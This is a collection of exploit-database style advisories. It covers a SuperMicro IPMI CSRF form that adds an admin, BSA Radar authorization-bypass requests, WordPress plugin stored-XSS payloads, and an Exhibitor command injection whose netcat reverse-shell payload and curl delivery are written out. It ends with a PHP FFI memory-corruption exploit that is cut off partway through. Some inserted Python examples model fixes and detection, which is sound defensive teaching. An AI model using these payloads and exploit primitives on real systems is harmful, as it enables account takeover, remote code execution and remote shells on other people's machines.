# Exploit Title: SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.supermicro.com/
# Software Link: https://www.supermicro.com/en/solutions/management-software/bmc-resources
# Version: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
# CVE: CVE-2020-15046
# Source: https://www.totalpentest.com/post/supermicro-ipmi-webgui-cross-site-request-forgery

# Description:
# The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and
# IPMI firmware 03.40 allows remote attackers to exploit a CSRF issue in
# cgi/config_user.cgi to add new admin users: the endpoint honours any
# request that arrives with a valid session cookie, so a form on an
# attacker's page submitted by a logged-in administrator's browser is
# accepted. The PoC below sets new_privilege=4, the IPMI Administrator
# privilege level.
# The fixed versions are BIOS 3.2 and firmware 03.88.

# PoC :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST">
      <input type="hidden" name="username" value="JOKER" />
      <input type="hidden" name="original&#95;username" value="2" />
      <input type="hidden" name="password" value="onebadday" />
      <input type="hidden" name="new&#95;privilege" value="4" />
      <input type="submit" value="submit request" />
    </form>
  </body>
</html>
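The form above succeeds because the BMC authorizes the request on the session cookie alone. The following is an added example (not Supermicro firmware code and not part of the original advisory) that models that handler next to one with the two server-side checks that defeat the PoC: an Origin/Referer comparison and a per-session synchronizer token compared in constant time. The request model, the session store, the csrf_token field, and the origin https://supermicro-ip are assumptions of the example; the form fields are the ones from the PoC.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Assumed canonical origin of the BMC web interface (the PoC uses the
# placeholder host "SuperMicro-IP"); host comparison is case-insensitive.
BMC_ORIGIN = "https://supermicro-ip"

# Constructed session store: session id -> logged-in user, IPMI privilege, CSRF token
SESSIONS = {"sid-1234": {"user": "ADMIN", "priv": 4, "csrf": secrets.token_hex(16)}}


@dataclass
class Request:
    headers: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


def session_of(req):
    return SESSIONS.get(req.cookies.get("SID"))


def vulnerable_config_user(req, users):
    """Models the pre-fix behaviour: the request is honoured as long as the browser
    sends a valid admin session cookie, no matter which page submitted the form."""
    sess = session_of(req)
    if sess is None or sess["priv"] < 4:
        return 403
    users[req.form["username"]] = int(req.form["new_privilege"])
    return 200


def same_origin(req):
    """Browsers attach Origin (and usually Referer) to cross-site form POSTs, and a
    page on attacker.example cannot forge them; reject if missing or foreign."""
    src = req.headers.get("Origin") or req.headers.get("Referer")
    if not src:
        return False
    p = urlsplit(src)
    return f"{p.scheme}://{p.netloc}".lower() == BMC_ORIGIN


def hardened_config_user(req, users):
    """Same handler plus an origin check and a per-session synchronizer token."""
    sess = session_of(req)
    if sess is None or sess["priv"] < 4:
        return 403
    if not same_origin(req):
        return 403
    # constant-time compare; a missing token compares against "" and fails
    if not hmac.compare_digest(req.form.get("csrf_token", ""), sess["csrf"]):
        return 403
    users[req.form["username"]] = int(req.form["new_privilege"])
    return 200


def run_poc(handler):
    """Replays the PoC form as the victim's browser would send it: the BMC session
    cookie is attached automatically, but the request originates from the
    attacker's page and carries no anti-CSRF token."""
    users = {"ADMIN": 4}
    req = Request(
        headers={"Origin": "https://attacker.example",
                 "Referer": "https://attacker.example/poc.html"},
        cookies={"SID": "sid-1234"},
        form={"username": "JOKER", "original_username": "2",
              "password": "onebadday", "new_privilege": "4"},
    )
    return handler(req, users), users


def run_legit(handler):
    """The same change submitted from the BMC's own page with the session's token."""
    users = {"ADMIN": 4}
    req = Request(
        headers={"Origin": BMC_ORIGIN},
        cookies={"SID": "sid-1234"},
        form={"username": "JOKER", "original_username": "2", "password": "onebadday",
              "new_privilege": "4", "csrf_token": SESSIONS["sid-1234"]["csrf"]},
    )
    return handler(req, users), users


if __name__ == "__main__":
    print("PoC vs vulnerable handler:", run_poc(vulnerable_config_user))
    print("PoC vs hardened handler:  ", run_poc(hardened_config_user))
    print("Legit vs hardened handler:", run_legit(hardened_config_user))
```

The origin check alone already blocks this PoC; the token is kept because Referer/Origin can be absent in some proxy setups, and a token that is bound to the session fails closed in that case instead of falling back to cookie-only authorization.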
            
# Exploit title: BSA Radar 1.6.7234.24750 - Cross-Site Request Forgery (Change Password)
# Exploit Author: William Summerhill
# Date: 2020-06-22
# Vendor Homepage: https://www.globalradar.com/
# Version: BSA Radar - Version 1.6.7234.24750 and lower
# CVE: CVE-2020-14944

# Description: The Global RADAR BSA Radar 1.6.7234.X application lacks valid authorization
# controls in multiple functions that are reachable once a user is logged into the application.
# This allows manipulation and takeover of other users' accounts if successfully exploited.

# The following vulnerable functions are exposed: ChangePassword, SaveUserProfile, GetUser

Proof of Concept:

1. ChangePassword API endpoint - Allows updating the password of another account by its UserID, leading to account takeover.
   HTTP Request PoC:

   POST /WS/AjaxWS.asmx/ChangePassword

   {"password":
   {"UserID":XXXX,"NewPassword":"NEWPASSHERE","NewPasswordConfirm":"NEWPASSHERE",<REMAINDER OF REQUEST HERE>} }

   The UserID and NewPassword parameters can be forged to force a password change on another existing user account by supplying that account's UserID.

2. SaveUserProfile API endpoint - Allows updating the user profile of another account by its UserID. This covers modifiable details such as first name, last name, email, and phone number. It also allows injection of Stored Cross-Site Scripting (XSS) into arbitrary user account profiles, as the Firstname and Lastname parameters are not sanitized. This can lead to session hijacking, theft of application data, or redirection of users to attacker-controlled sites for phishing.
   HTTP Request PoC:

   POST /WS/AjaxWS.asmx/SaveUserProfile

   {"user":
   {"UserID":XXXX,"BankID":XXX,"Firstname":"<ARBITRARY INPUT HERE OR STORED XSS SCRIPT>","Lastname":"<ARBITRARY INPUT HERE OR STORED XSS SCRIPT>","Title":"","Phone":"<ARBITRARY INPUT HERE>","Email":"<Correct email here>",<REMAINDER OF REQUEST HERE>} }

   Multiple parameters above can be forged and modified for existing UserID accounts. The Firstname and Lastname parameters are vulnerable to stored XSS, which can be used to inject malicious scripts into existing user accounts to steal sessions or account data, or to redirect users to malicious pages.

3. GetUser API endpoint - Allows viewing the account details of any user by enumerating UserIDs.
   HTTP Request PoC:

   POST /WS/AjaxWS.asmx/GetUser

   {"userID":XXXX }

   The userID parameter can be forged to enumerate existing UserIDs and return their account details, such as full name, username, user permissions, account role, email, and password question.
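All three endpoints share one defect: the caller is authenticated, but the UserID in the request body is never checked against the caller. The following is an added example (not Global RADAR code) showing a ChangePassword handler with that defect beside ChangePassword and GetUser handlers with an object-level authorization check. The user table, the "User"/"Admin" role names and the way the session identifies the caller are constructed for the example; the JSON shapes follow the PoC requests above.

```python
import json


def fresh_users():
    """Constructed user table: UserID -> record (stands in for the application DB)."""
    return {
        1001: {"Username": "alice", "Role": "User",  "Password": "alice-old", "Email": "alice@example.test"},
        1002: {"Username": "bob",   "Role": "User",  "Password": "bob-old",   "Email": "bob@example.test"},
        2001: {"Username": "carol", "Role": "Admin", "Password": "carol-old", "Email": "carol@example.test"},
    }


def change_password_vulnerable(users, session_user_id, body):
    """Mirrors the reported behaviour: the caller is authenticated (session_user_id),
    but the UserID taken from the JSON body is trusted without any ownership check."""
    p = json.loads(body)["password"]
    if p["NewPassword"] != p["NewPasswordConfirm"]:
        return 400
    users[p["UserID"]]["Password"] = p["NewPassword"]
    return 200


def authorize(users, session_user_id, target_user_id):
    """Object-level authorization: a user may act on their own record; only an
    Admin may act on someone else's."""
    actor = users.get(session_user_id)
    if actor is None:
        return False
    return session_user_id == target_user_id or actor["Role"] == "Admin"


def change_password_fixed(users, session_user_id, body):
    p = json.loads(body)["password"]
    if not authorize(users, session_user_id, p["UserID"]):
        return 403
    if p["UserID"] not in users:
        return 404
    if p["NewPassword"] != p["NewPasswordConfirm"]:
        return 400
    users[p["UserID"]]["Password"] = p["NewPassword"]
    return 200


def get_user_fixed(users, session_user_id, body):
    """GetUser with the same check; the stored password never leaves the server."""
    uid = json.loads(body)["userID"]
    if not authorize(users, session_user_id, uid):
        return 403, None
    rec = users.get(uid)
    if rec is None:
        return 404, None
    return 200, {k: v for k, v in rec.items() if k != "Password"}


def attacker_change_password(target_uid):
    """The ChangePassword body from PoC item 1 with a victim's UserID filled in."""
    return json.dumps({"password": {"UserID": target_uid,
                                    "NewPassword": "NEWPASSHERE",
                                    "NewPasswordConfirm": "NEWPASSHERE"}})


if __name__ == "__main__":
    users = fresh_users()
    print("alice resets bob (vulnerable):",
          change_password_vulnerable(users, 1001, attacker_change_password(1002)),
          users[1002]["Password"])
    users = fresh_users()
    print("alice resets bob (fixed):     ",
          change_password_fixed(users, 1001, attacker_change_password(1002)),
          users[1002]["Password"])
    print("alice reads bob (fixed):      ", get_user_fixed(users, 1001, '{"userID":1002}'))
```

Returning 403 before the 404 check matters for the GetUser enumeration in item 3: if the existence check ran first, a non-admin could still tell valid UserIDs from invalid ones by the status code.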

Tested on: Windows

Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14944
            
# Exploit Title: WordPress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting
# Date: 2020-07-07
# Vendor Homepage: https://powie.de
# Vendor Changelog: https://wordpress.org/plugins/powies-whois/#developers
# Software Link: https://wordpress.org/plugins/powies-whois/
# Exploit Author: mqt
# Author Homepage: https://blog.haao.sh


1. Description

Powie's WHOIS WordPress plugin was found to be vulnerable to Stored XSS, as
multiple fields on the plugin's settings page fail to properly sanitize
user input. The risk is mitigated by the fact that active exploitation
requires authentication. However, a lower-privileged WordPress user would
be able to take advantage of the fact that the arbitrary JavaScript
executes on the same origin, and so, with a specially crafted payload, an
attacker could elevate their privileges or take any action an admin could.

All WordPress websites using Powie's WHOIS version < 0.9.31 are vulnerable.

2. Vulnerability

There are two sets of vulnerable fields, each requiring a different
payload to exploit.

The first set of vulnerable fields display their output inside a
`<textarea>` element:

Show on available domains (display-on-free)
Show on unavailable domains (display-on-connect)
Show on invalid domain (display-on-invalid)

As no sanitization is performed, an attacker can use a closing
`</textarea>` tag to close the HTML element and then inject
arbitrary JavaScript.


Vulnerable Code: (/plugins/powies-whois/pwhois_settings.php)

<tr valign="top">
    <th scope="row"><?php _e('Show on available domains', 'powies-whois') ?></th>
    <td><textarea rows="3" name="display-on-free" style="width:100%;"><?php echo get_option('display-on-free'); ?></textarea></td>
</tr>
<tr valign="top">
    <th scope="row"><?php _e('Show on unavailable domains', 'powies-whois') ?></th>
    <td><textarea rows="3" name="display-on-connect" style="width:100%;"><?php echo get_option('display-on-connect'); ?></textarea></td>
</tr>
<tr valign="top">
    <th scope="row"><?php _e('Show on invalid domain', 'powies-whois') ?></th>
    <td><textarea rows="3" name="display-on-invalid" style="width:100%;"><?php echo get_option('display-on-invalid'); ?></textarea></td>
</tr>

Payload: </textarea><img src=/ onerror=alert(1)>

Vulnerable HTTP Request:

POST /wp-admin/options.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=powies-whois%2Fpwhois_settings.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 479
Origin: http://localhost
Connection: close
Cookie: <snipped for brevity>
Upgrade-Insecure-Requests: 1

option_page=pwhois-settings&action=update&_wpnonce=e632f68003&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpowies-whois%252Fpwhois_settings.php%26settings-updated%3Dtrue&show-whois-output=1&display-on-free=%3C%2Ftextarea%3E%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&display-on-connect=%3C%2Ftextarea%3E%3Cimg+src%3D%2F+onerror%3Dalert%282%29%3E&display-on-invalid=%3C%2Ftextarea%3E%3Cimg+src%3D%2F+onerror%3Dalert%283%29%3E&before-whois-output=&after-whois-output=


The second set of vulnerable fields display their output in the value
attribute of an `<input>` element. As no sanitization is performed, an
attacker can use a specially crafted input to escape the value attribute
and inject arbitrary JavaScript.

Vulnerable Code: (/plugins/powies-whois/pwhois_settings.php)

<tr valign="top">
     <th scope="row"><?php _e('HTML before whois output', 'powies-whois') ?></th>
     <td><input type="text" name="before-whois-output" value="<?php echo get_option('before-whois-output'); ?>" style="width:100%;" /></td>
</tr>
<tr valign="top">
     <th scope="row"><?php _e('HTML after whois output', 'powies-whois') ?></th>
     <td><input type="text" name="after-whois-output" value="<?php echo get_option('after-whois-output'); ?>" style="width:100%;"/></td>
</tr>

Payload: "><img src=/ onerror=alert(1)>

Vulnerable HTTP Request:
POST /wp-admin/options.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=powies-whois%2Fpwhois_settings.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 398
Origin: http://localhost
Connection: close
Cookie: <snipped for brevity>
Upgrade-Insecure-Requests: 1

option_page=pwhois-settings&action=update&_wpnonce=e632f68003&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpowies-whois%252Fpwhois_settings.php%26settings-updated%3Dtrue&show-whois-output=1&display-on-free=&display-on-connect=&display-on-invalid=&before-whois-output=%22%3E%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&after-whois-output=%22%3E%3Cimg+src%3D%2F+onerror%3Dalert%282%29%3E
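The two payloads differ only because of the output context: a textarea body is closed with `</textarea>`, an attribute value with `"`. The following added example (not the plugin's code) reproduces the two row types from pwhois_settings.php and renders the payloads from the two requests above three ways: raw (echo get_option() as in the vulnerable code), escaping only &, < and > everywhere, and context-aware escaping. In a fixed PHP version the last would be esc_textarea() for the textarea bodies and esc_attr() for the value= attributes; html.escape() stands in for both here. The option values and the parser-based detector are constructed for the example.

```python
import html
from html.parser import HTMLParser

TEXTAREA_FIELDS = ("display-on-free", "display-on-connect", "display-on-invalid")
INPUT_FIELDS = ("before-whois-output", "after-whois-output")


def render_settings(options, mode):
    """mode 'raw'     : echo the stored option verbatim (the vulnerable plugin)
       mode 'naive'   : escape & < > everywhere (enough for text, not for attributes)
       mode 'context' : text escaping in <textarea>, attribute escaping in value="..." """
    rows = []
    for name in TEXTAREA_FIELDS:
        val = options.get(name, "")
        if mode in ("naive", "context"):
            val = html.escape(val, quote=False)          # stands in for esc_textarea()
        rows.append(f'<textarea rows="3" name="{name}" style="width:100%;">{val}</textarea>')
    for name in INPUT_FIELDS:
        val = options.get(name, "")
        if mode == "naive":
            val = html.escape(val, quote=False)          # leaves the closing quote intact
        elif mode == "context":
            val = html.escape(val, quote=True)           # stands in for esc_attr()
        rows.append(f'<input type="text" name="{name}" value="{val}" style="width:100%;" />')
    return "\n".join(rows)


class HandlerFinder(HTMLParser):
    """Collects (tag, attribute) for every on* event handler the browser would see,
    i.e. every place where attacker-controlled script would run."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        for name, _ in attrs:
            if name.startswith("on"):
                self.found.append((tag, name))


def injected_handlers(markup):
    parser = HandlerFinder()
    parser.feed(markup)
    parser.close()
    return parser.found


# Constructed option values: the decoded payloads from the two request bodies above.
POISONED_OPTIONS = {
    "display-on-free": "</textarea><img src=/ onerror=alert(1)>",
    "display-on-connect": "</textarea><img src=/ onerror=alert(2)>",
    "display-on-invalid": "</textarea><img src=/ onerror=alert(3)>",
    "before-whois-output": '"><img src=/ onerror=alert(1)>',
    "after-whois-output": '"><img src=/ onerror=alert(2)>',
}

if __name__ == "__main__":
    for mode in ("raw", "naive", "context"):
        print(f"{mode:8s}", injected_handlers(render_settings(POISONED_OPTIONS, mode)))
```

The 'naive' mode is the interesting failure: escaping `<` and `>` is enough for the textarea bodies, but in the value attribute the unescaped `"` still terminates the value and the rest of the payload becomes attributes of the `<input>` itself, so the event handler survives without any `<img>` tag being created.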
            
# Exploit Title: Exhibitor Web UI 1.7.1 - Remote Code Execution
# Date: 2019-11-13
# Exploit Author: Logan Sanderson
# Web Site: https://github.com/soabase/exhibitor/wiki/Running-Exhibitor
# Version : 1.7.1
# CVE : CVE-2019-5029

Exhibitor UI command injection vulnerability
November 13, 2019
CVE Number

CVE-2019-5029
Summary

An exploitable command injection vulnerability exists in the Config editor of the Exhibitor Web UI versions 1.0.9 to 1.7.1. Arbitrary shell commands surrounded by backticks or $() can be inserted into the editor and will be executed by the Exhibitor process when it launches ZooKeeper. An attacker can execute any command as the user running the Exhibitor process.
Tested Versions

Tested version was compiled using the standalone pom.xml from the Exhibitor master branch.

(Note that the latest released version is labeled 1.7.1, but the version in the exhibitor-standalone’s pom.xml is set to 1.6.0.)

The vulnerability should affect all versions at least as far back as 1.0.9, when the javaEnvironment variable was added.
Product URLs

https://github.com/soabase/exhibitor
CVSSv3 Score

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command
Details

Exhibitor is a ZooKeeper supervisory process, which is described in the ZooKeeper documentation.

Since the ZooKeeper server will exit on an error, the Apache ZooKeeper documentation suggests a supervisory process that manages the ZooKeeper server process, mainly for the purpose of restarting ZooKeeper when it exits.

Exhibitor’s Web UI does not have any form of authentication, and prior to version 1.7.0, did not have any way to specify which interfaces to listen on. Exposing Exhibitor is dangerous for the ZooKeeper ensemble because Exhibitor allows the changing of the ZooKeeper configuration, and also provides a UI for viewing and modifying keys and values stored in ZooKeeper.

By default, the Exhibitor Web UI listens on TCP 8080. However, since this port is commonly used, it may be common to find it on other ports as well.

Under the Config tab in the Exhibitor Web UI, the “java.env script” field can be modified and the new configuration pushed to ZooKeeper. Exhibitor launches ZooKeeper through a script, and the contents of this field are passed, unmodified, as arguments to the Java command that launches ZooKeeper.

(The contents of the “java.env script” field are passed in as $JVMFLAGS.)

Based on how this argument is passed, there are several ways to execute arbitrary commands. The methods tested were surrounding the command with backticks and using $(), for example:

$(/bin/nc -e /bin/sh 10.0.0.64 4444 &)

This example uses netcat to open a reverse shell to a listener on 10.0.0.64:4444.

In the example, ZooKeeper will still launch successfully after the command executes, and it will run the command every time ZooKeeper is re-launched by Exhibitor.
Exploit Proof of Concept

The included screenshots show the process of obtaining a root shell on the system.

The steps to exploit it from a web browser:

1. Open the Exhibitor Web UI and click on the Config tab, then flip the Editing switch to ON.
2. In the “java.env script” field, enter any command surrounded by $() or ``, for example, for a simple reverse shell:

   $(/bin/nc -e /bin/sh 10.0.0.64 4444 &)

3. Click Commit > All At Once > OK.
4. The command may take up to a minute to execute.

It can also be performed with a single curl command:

command:

curl -X POST -d @data.json http://10.0.0.200:8080/exhibitor/v1/config/set

data.json:

{
  "zookeeperInstallDirectory": "/opt/zookeeper",
  "zookeeperDataDirectory": "/opt/zookeeper/snapshots",
  "zookeeperLogDirectory": "/opt/zookeeper/transactions",
  "logIndexDirectory": "/opt/zookeeper/transactions",
  "autoManageInstancesSettlingPeriodMs": "0",
  "autoManageInstancesFixedEnsembleSize": "0",
  "autoManageInstancesApplyAllAtOnce": "1",
  "observerThreshold": "0",
  "serversSpec": "1:exhibitor-demo",
  "javaEnvironment": "$(/bin/nc -e /bin/sh 10.0.0.64 4444 &)",
  "log4jProperties": "",
  "clientPort": "2181",
  "connectPort": "2888",
  "electionPort": "3888",
  "checkMs": "30000",
  "cleanupPeriodMs": "300000",
  "cleanupMaxFiles": "20",
  "backupPeriodMs": "600000",
  "backupMaxStoreMs": "21600000",
  "autoManageInstances": "1",
  "zooCfgExtra": {
    "tickTime": "2000",
    "initLimit": "10",
    "syncLimit": "5",
    "quorumListenOnAllIPs": "true"
  },
  "backupExtra": { "directory": "" },
  "serverId": 1
}
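Because the “java.env script” text reaches the shell unmodified, both auditing an exposed Exhibitor and fixing it reduce to one question: does the field contain shell syntax? The following added example (not Exhibitor code) checks a config object of the data.json shape above for command substitution, separators, redirection and embedded newlines, and shows an allowlist that a patched server could enforce before writing java.env. Treating log4jProperties as shell-exposed and the NAME=value allowlist grammar are assumptions of the example; the sample documents are constructed. To audit a live instance, feed it the config object returned by the Exhibitor REST API instead of the samples.

```python
import json
import re

# Config fields whose contents end up in the shell environment that launches
# ZooKeeper.  javaEnvironment is the field named in the advisory; log4jProperties
# is written to disk alongside it and is included as a conservative assumption.
SHELL_EXPOSED_FIELDS = ("javaEnvironment", "log4jProperties")

# Constructs that make a POSIX shell run something when the text is sourced or expanded.
SHELL_PATTERNS = {
    "command substitution $(...)": re.compile(r"\$\("),
    "backtick substitution":       re.compile(r"`"),
    "command separator ; & |":     re.compile(r"[;&|]"),
    "redirection < >":             re.compile(r"[<>]"),
    "embedded newline":            re.compile(r"[\r\n]"),
}

# Illustrative allowlist for one java.env line: optional `export`, then NAME=value
# where the value is limited to characters with no special meaning to the shell.
JAVA_ENV_LINE = re.compile(r"^(?:export\s+)?[A-Za-z_][A-Za-z0-9_]*=[A-Za-z0-9_./:=,+\- ]*$")


def audit_field(value):
    """Names of the dangerous constructs present in one field value."""
    return [name for name, pat in SHELL_PATTERNS.items() if pat.search(value)]


def audit_config(cfg):
    """cfg: the config object (same shape as the data.json body above).
    Returns {field: [findings]} for every shell-exposed field that looks tampered."""
    findings = {}
    for name in SHELL_EXPOSED_FIELDS:
        val = cfg.get(name, "")
        if isinstance(val, str):
            hits = audit_field(val)
            if hits:
                findings[name] = hits
    return findings


def java_env_is_allowed(value):
    """Server-side validation a fixed Exhibitor could apply before writing java.env:
    every non-blank line must match the NAME=value allowlist.  Rejecting is safe
    because a legitimate java.env only ever assigns variables."""
    return all(JAVA_ENV_LINE.match(line) for line in value.splitlines() if line.strip())


# Constructed samples: a benign java.env and the advisory's payload.
BENIGN = {"javaEnvironment": "export JVMFLAGS=-Xmx512m -Xms512m", "log4jProperties": ""}
MALICIOUS = json.loads('{"javaEnvironment": "$(/bin/nc -e /bin/sh 10.0.0.64 4444 &)",'
                       ' "log4jProperties": ""}')

if __name__ == "__main__":
    for label, cfg in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(f"{label:9s} findings={audit_config(cfg)} "
              f"allowed={java_env_is_allowed(cfg['javaEnvironment'])}")
```

The detector is deliberately broad (a stray `&` or `>` in a JVM flag will be flagged) because on an unauthenticated management UI a false positive costs a minute of review, while a missed `$(...)` costs the host.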
Mitigation

Since Exhibitor has no built-in authentication, it would be helpful to limit the interfaces it listens on to only trusted networks, or require authentication using something like an nginx reverse proxy and block all other access using firewall rules.

If the features provided by the Exhibitor Web UI are not needed and the only needed functionality is managing the ZooKeeper process, it should be replaced with a simpler ZooKeeper supervisor solution, such as a systemd service.
Timeline

2019-03-08 - Vendor Disclosure
2019-05-01 - GitHub issue #389 created; Vendor advised point of contact changed. Copy of report sent to new point of contact
2019-05-14 - (75 day) 3rd follow up with vendor
2019-05-29 - Final notice of public disclosure release
2019-11-13 - Public Release
Credit

Discovered by Logan Sanderson of Cisco ASIG.
            
<?php
/*
FFI Exploit - uses 3 potential BUGS.
PHP was contacted and said nothing in FFI is a security issue.

Able to call system($cmd) without using FFI::load() or FFI::cdefs()

* BUG #1 (maybe intended, but why have any size checks then?)
  no bounds check for FFI::string() when type is ZEND_FFI_TYPE_POINTER
  (https://github.com/php/php-src/blob/php-7.4.7RC1/ext/ffi/ffi.c#L4411)

* BUG #2 (maybe intended, but why have any checks then?)
  no bounds check for FFI::memcpy when type is ZEND_FFI_TYPE_POINTER
  (https://github.com/php/php-src/blob/php-7.4.7RC1/ext/ffi/ffi.c#L4286)

* BUG #3
  Can walk back a CDATA object to get a pointer to its internal reference pointer using FFI::addr():
  call FFI::addr() on a CDATA object to get its pointer (also a CDATA object), then call FFI::addr()
  on the resulting ptr to get a handle to its ptr, which is the ptr_holder for the original CDATA
  object


   the easiest way to call a function is to create a cdata object, write the target RIP (zif_system's address) to it
   and finally modify its zend_ffi_type_kind to ZEND_FFI_TYPE_FUNC to call it

Exploit steps:
    1. Use read/write to leak zif_system pointer
        a. walk cdata object to leak handlers pointer ( in .bss )
        b. scan .bss for pointer to a known value ( *.rodata ptr), that we know usually sits
            right below a pointer to the .data.relro segment
        c. Increment and read the .data.relro pointer to get a relro section leak
        d. Using the relro section leak, scan up memory looking for the 'system' string that is
           inside the zif_system relro entry. 
        e. once found, increment and leak the zif_system pointer
    2. Hijack RIP with complete argument control
        a. create a function pointer CDATA object using FFI::new() [not callable as it is
            technically not a proper ZEND_FFI_TYPE_FUNC since it wasn't made with FFI::cdef()]
        b. Overwrite the object's data with the zif_system pointer
        c. Overwrite the object's zend_ffi_type_kind with ZEND_FFI_TYPE_FUNC so that it is
            callable with our own arguments
    3. Create proper argument object to pass to zif_system (zend_execute_data .. )
        a. Build out the zend_execute_data object in a php string
        b. right after the object is the argument object itself (zval) which we must also
            build. To do so we build our PHP_STRING in another FFI buffer, leak the pointer
            and place it into a fake zval STRING object.
        c. finally we can call zif_system with a controlled argument

    NOTE: does NOT exit cleanly nor give command output -- both may be possible

Author: Hunter Gregal
Tested on:
    - PHP 7.4.7 x64 Ubuntu 20, ./configure --disable-all --with-ffi
    - PHP 7.4.3 x64 Ubuntu 20 (apt install)
*/

ini_set("display_errors", "On");
error_reporting(E_ALL);

function pwn($cmd) {
    function allocate($amt, $fill) {
        // could do $persistent = TRUE to alloc on libc malloc heap instead
        // but we already have a good read/write primitive
        // and relying on libc leaks for gadgets is not very portable
        // (custom compiled libc -> see pornhub php 0-day)
        $buf = FFI::new("char [".$amt."]");
        $bufPtr = FFI::addr($buf);
        FFI::memset($bufPtr, $fill, $amt);
        // not sure if i need to keep the CData reference alive
        // or not - but just in case return it too for now
        return array($bufPtr, $buf);
    }
    
    // uses leak to leak data from FFI ptr
    function leak($ptr, $n, $hex) {
        if ( $hex == 0 ) {
            return FFI::string($ptr, $n);
        } else {
            return bin2hex(FFI::string($ptr, $n));
        }
    }
    
    function ptrVal($ptr) {
        $tmp = FFI::cast("uint64_t", $ptr);
        return $tmp->cdata;
    }
    
    /* Read primitive
    writes target address overtop of CDATA object pointer, 
    then leaks directly from the CDATA object
    */
    function Read($addr, $n = 8, $hex = 0) {
        // Create vulnBuf which we walk back to do the overwrite
        // (the size and contents dont really matter)
        list($vulnBufPtr, $vulnBuf) = allocate(1, 0x42); // B*8
        // walk back to get ptr to ptr (heap)
        $vulnBufPtrPtr = FFI::addr($vulnBufPtr);
        /*// DEBUG
        $vulnBufPtrVal = ptrVal($vulnBufPtr);
        $vulnBufPtrPtrVal = ptrVal($vulnBufPtrPtr);
        printf("vuln BufPtr =  %s\n", dechex($vulnBufPtrVal));
        printf("vuln BufPtrPtr =  %s\n", dechex($vulnBufPtrPtrVal));
        printf("-------\n\n");
        */
    
        // Overwrite the ptr
        $packedAddr = pack("Q",$addr);
        FFI::memcpy($vulnBufPtrPtr, $packedAddr, 8);
    
        // Leak the overwritten ptr
        return leak($vulnBufPtr, $n, $hex);
    }
    
    /* Write primitive
    writes target address overtop of CDATA object pointer, 
    then writes directly to the CDATA object
    */
    function Write($addr, $what, $n) {
        // Create vulnBuf which we walk back to do the overwrite
        // (the size and contents dont really matter)
        list($vulnBufPtr, $vulnBuf) = allocate(1, 0x42); // B*8
        // walk back to get ptr to ptr (heap)
        $vulnBufPtrPtr = FFI::addr($vulnBufPtr);
        /*// DEBUG
        $vulnBufPtrVal = ptrVal($vulnBufPtr);
        $vulnBufPtrPtrVal = ptrVal($vulnBufPtrPtr);
        printf("vuln BufPtr =  %s\n", dechex($vulnBufPtrVal));
        printf("vuln BufPtrPtr =  %s\n", dechex($vulnBufPtrPtrVal));
        printf("-------\n\n");
        */
    
        // Overwrite the ptr
        $packedAddr = pack("Q",$addr);
        FFI::memcpy($vulnBufPtrPtr, $packedAddr, 8);
    
        // Write to the overwritten ptr
        FFI::memcpy($vulnBufPtr, $what, $n);
    }
    
    function isPtr($knownPtr, $testPtr) {
        if ( ($knownPtr & 0xFFFFFFFF00000000) == ($testPtr & 0xFFFFFFFF00000000)) {
            return 1;
        } else {
            return 0;
        }
    }
    
    /* Walks looking for valid pointers
    * - each valid ptr is read and if it 
    -  points to the target return the address of the
    -  ptr and the location it was found
    */
    //function getRodataAddr($bssLeak) {
    function walkSearch($segmentLeak, $maxQWORDS, $target, $size = 8, $up = 0) {
        $start = $segmentLeak;
        for($i = 0; $i < $maxQWORDS; $i++) {
            if ( $up == 0 ) { // walk 'down' addresses
                $addr = $start - (8 * $i);
            } else { // walk 'up' addresses
                $addr = $start + (8 * $i);
            }
            //$leak = Read($addr, 8);
            $leak = unpack("Q", Read($addr))[1];
            
            // skip if its not a valid pointer...
            if ( isPtr($segmentLeak, $leak) == 0 ) {
                continue;
            }
            $leak2 = Read($leak, $n = $size);
            //printf("0x%x->0x%x = %s\n", $addr, $leak, $leak2);
            if( strcmp($leak2, $target) == 0 ) { # match
                return array ($leak, $addr);
            }
        }
        return array(0, 0);
    }

    function getBinaryBase($textLeak) {
        $start = $textLeak & 0xfffffffffffff000;
        for($i = 0; $i < 0x10000; $i++) {
            $addr = $start - 0x1000 * $i;
            $leak = Read($addr, 7);
            //if($leak == 0x10102464c457f) { # ELF header
            if( strcmp($leak, "\x7f\x45\x4c\x46\x02\x01\x01") == 0 ) { # ELF header
                return $addr;
            }
        }
        return 0;
    }
 
    function parseElf($base) {
        $e_type = unpack("S", Read($base + 0x10, 2))[1];

        $e_phoff = unpack("Q", Read($base + 0x20))[1];
